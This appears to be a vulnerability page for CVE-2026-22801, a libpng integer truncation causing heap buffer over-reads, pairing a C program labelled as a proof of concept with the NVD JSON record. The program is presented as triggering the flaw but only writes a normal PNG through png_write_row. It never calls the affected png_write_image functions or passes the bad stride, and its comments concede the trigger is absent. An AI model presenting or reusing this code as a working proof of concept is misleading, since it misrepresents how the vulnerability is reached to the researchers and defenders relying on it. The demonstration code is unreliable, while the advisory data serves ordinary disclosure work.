CVE-2026-22801

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <png.h> // PoC for CVE-2026-22801: libpng integer truncation in png_write_image_* // This demonstrates triggering heap buffer over-read with negative row_stride void create_malicious_png() { png_structp png_ptr; png_infop info_ptr; FILE *fp; // Create PNG with abnormal dimensions to trigger the vulnerability int width = 100; int height = 100; // Allocate image data png_bytep row = (png_bytep)malloc(width * 4); // 32-bit RGBA // Initialize row data memset(row, 0x41, width * 4); fp = fopen("poc.png", "wb"); if (!fp) { free(row); return; } png_ptr = png_create_write_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL); if (!png_ptr) { fclose(fp); free(row); return; } info_ptr = png_create_info_struct(png_ptr); if (!info_ptr) { png_destroy_write_struct(&png_ptr, NULL); fclose(fp); free(row); return; } png_init_io(png_ptr, fp); png_set_IHDR(png_ptr, info_ptr, width, height, 8, PNG_COLOR_TYPE_RGB_ALPHA, PNG_INTERLACE_NONE, PNG_COMPRESSION_TYPE_DEFAULT, PNG_FILTER_TYPE_DEFAULT); png_write_info(png_ptr, info_ptr); // Vulnerability trigger: Pass negative row_stride (interpreted as large positive) // In real attack scenario, this would be done through custom libpng usage // The actual trigger requires modifying libpng or using specific image configurations for (int y = 0; y < height; y++) { png_write_row(png_ptr, row); } png_write_end(png_ptr, info_ptr); png_destroy_write_struct(&png_ptr, &info_ptr); fclose(fp); free(row); printf("PoC PNG created: poc.png\n"); printf("Note: Actual trigger requires specific row_stride configuration\n"); } int main() { printf("CVE-2026-22801 PoC - libpng Integer Truncation\n"); printf("Affected: libpng 1.6.26 to 1.6.53\n"); create_malicious_png(); return 0; }

{"cve": {"id": "CVE-2026-22801", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.907", "lastModified": "2026-01-21T18:58:18.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54."}, {"lang": "es", "value": "LIBPNG es una biblioteca de referencia para usar en aplicaciones que leen, crean y manipulan archivos de imagen ráster PNG (Portable Network Graphics). Desde la versión 1.6.26 hasta la 1.6.53, existe un truncamiento de enteros en las funciones API de escritura simplificadas de libpng, png_write_image_16bit y png_write_image_8bit, que causa una lectura excesiva del búfer de la pila (heap buffer over-read) cuando el llamador proporciona un paso de fila negativo (para diseños de imagen de abajo hacia arriba) o un paso que excede los 65535 bytes. El error fue introducido en libpng 1.6.26 (octubre de 2016) por conversiones de tipo añadidas para silenciar advertencias del compilador en sistemas de 16 bits. Esta vulnerabilidad está corregida en la versión 1.6.54."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-190"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.26", "versionEndExcluding": "1.6.54", "matchCriteriaId": "4E5664F6-3EA2-4459-8380-BEB9937EFBE1"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}